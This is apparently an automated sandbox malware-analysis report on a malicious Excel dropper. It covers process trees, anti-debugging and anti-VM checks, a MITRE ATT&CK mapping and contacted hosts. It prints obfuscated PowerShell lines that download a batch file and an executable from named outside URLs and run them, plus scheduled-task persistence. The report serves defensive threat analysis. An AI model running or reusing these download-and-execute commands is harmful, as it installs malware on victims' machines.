Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match

File source: 00000018.00000002.2229844300.0000000002900000.00000004.00000001.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Roaming\sb.exe

Window / User API: threadDelayed 3762

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2792	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1296	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2972	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2980	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe TID: 2304	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe TID: 2496	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe TID: 2732	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe TID: 672	Thread sleep time: -37620s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe TID: 2828	Thread sleep time: -340000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe TID: 1336	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe TID: 2848	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\sb.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\sb.exe

Thread sleep count: Count: 3762 delay: -10

Jump to behavior

Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError,		27_2_00426F7A
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_005C7F30 FindFirstFileW,GetLastError,		27_2_005C7F30

Source: C:\Users\user\AppData\Roaming\sb.exe

Code function: 27_2_0044A238 __EH_prolog,new,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetProductInfo,

27_2_0044A238

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 0000000E.00000002.2106173596.0000000000126000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Users\user\AppData\Roaming\sb.exe

Code function: 27_2_00478772 NtSetInformationThread ?,00000011,00000000,00000000,?,?,00000000,00000000

27_2_00478772

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Roaming\sb.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\AppData\Roaming\sb.exe

Code function: 27_2_0058E501 IsDebuggerPresent,OutputDebugStringW,

27_2_0058E501

Source: C:\Users\user\AppData\Roaming\sb.exe

Code function: 27_2_004F2AA7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

27_2_004F2AA7

Source: C:\Users\user\AppData\Roaming\sb.exe

Code function: 27_2_0069B53C mov eax, dword ptr fs:[00000030h]

27_2_0069B53C

Source: C:\Users\user\AppData\Roaming\sb.exe

Code function: 27_2_004262FE __EH_prolog,GetProcessHeap,HeapAlloc,

27_2_004262FE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_006814DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		27_2_006814DA
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_0068B781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		27_2_0068B781

Source: C:\Users\user\AppData\Roaming\sb.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\sb.exe

Memory written: C:\Users\user\AppData\Roaming\sb.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 18,1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\sb.exe 'C:\Users\user\AppData\Roaming\sb.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process created: C:\Users\user\AppData\Roaming\sb.exe {path}	Jump to behavior

Language, Device and Operating System Detection:

Yara detected Obfuscated Powershell

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\Documents\pd.bat, type: DROPPED

Source: C:\Users\user\AppData\Roaming\sb.exe

Code function: 27_2_0040EA7D cpuid

27_2_0040EA7D

Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: GetLocaleInfoW,		27_2_0058E1F1
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: ___crtGetLocaleInfoEx,		27_2_0058E2F3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\sb.exe

Code function: 27_2_006A23D1 GetSystemTimeAsFileTime,

27_2_006A23D1

Source: C:\Users\user\AppData\Roaming\sb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: powershell.exe, 00000007.00000002.2107902230.00000000000EE000.00000004.00000020.sdmp

Binary or memory string: Sched.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting311	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools11	Input Capture1	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Scheduled Task/Job1	Process Injection111	Deobfuscate/Decode Files or Information11	LSASS Memory	File and Directory Discovery13	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution13	Logon Script (Windows)	Scheduled Task/Job1	Scripting311	Security Account Manager	System Information Discovery35	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter13	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Scheduled Task/Job1	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Security Software Discovery331	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	PowerShell2	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Virtualization/Sandbox Evasion13	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion13	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection111	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
spetsifikatsiya.xls	5%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\axoikBEWgDCn.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\sb.exe	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
cutt.ly	0%	Virustotal		Browse
speed-bg.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://37.46.150.139/bat/scriptxls_687c7069-ef4b-4efe-b745-594285a9a92b_mic2_wddisabler.bat	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cutt.ly	104.22.0.232	true	true	0%, Virustotal, Browse	unknown
speed-bg.com	79.124.76.20	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://37.46.150.139/bat/scriptxls_687c7069-ef4b-4efe-b745-594285a9a92b_mic2_wddisabler.bat	false	Avira URL Cloud: safe	unknown
http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.piriform.com/ccleaner	powershell.exe, 00000007.00000002.2107902230.00000000000EE000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2106136798.00000000000DE000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2157320922.000000000032E000.00000004.00000020.sdmp	false		high
http://www.%s.comPA	powershell.exe, 00000007.00000002.2110085564.0000000002420000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2129560236.0000000002450000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2106880201.0000000002390000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2157964975.0000000002360000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000007.00000002.2110085564.0000000002420000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2129560236.0000000002450000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2106880201.0000000002390000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2157964975.0000000002360000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaner7	powershell.exe, 00000010.00000002.2157320922.000000000032E000.00000004.00000020.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000007.00000002.2107902230.00000000000EE000.00000004.00000020.sdmp	false		high
http://www.piriform.com/ccleanerv	powershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.c	powershell.exe, 0000000E.00000002.2106136798.00000000000DE000.00000004.00000020.sdmp	false		high
http://www.piriform.com/cc	powershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmp	false		high
https://curl.haxx.se/docs/http-cookies.html	sb.exe	false		high
http://www.piriform.com/	powershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.157.162.81	unknown	Sweden	197595	OBE-EUROPEObenetworkEuropeSE	false
79.124.76.20	unknown	Bulgaria	31083	TELEPOINTBG	true
104.22.0.232	unknown	United States	13335	CLOUDFLARENETUS	true
37.46.150.139	unknown	Moldova Republic of	8758	IWAYCH	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	336052
Start date:	05.01.2021
Start time:	10:05:33
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	spetsifikatsiya.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
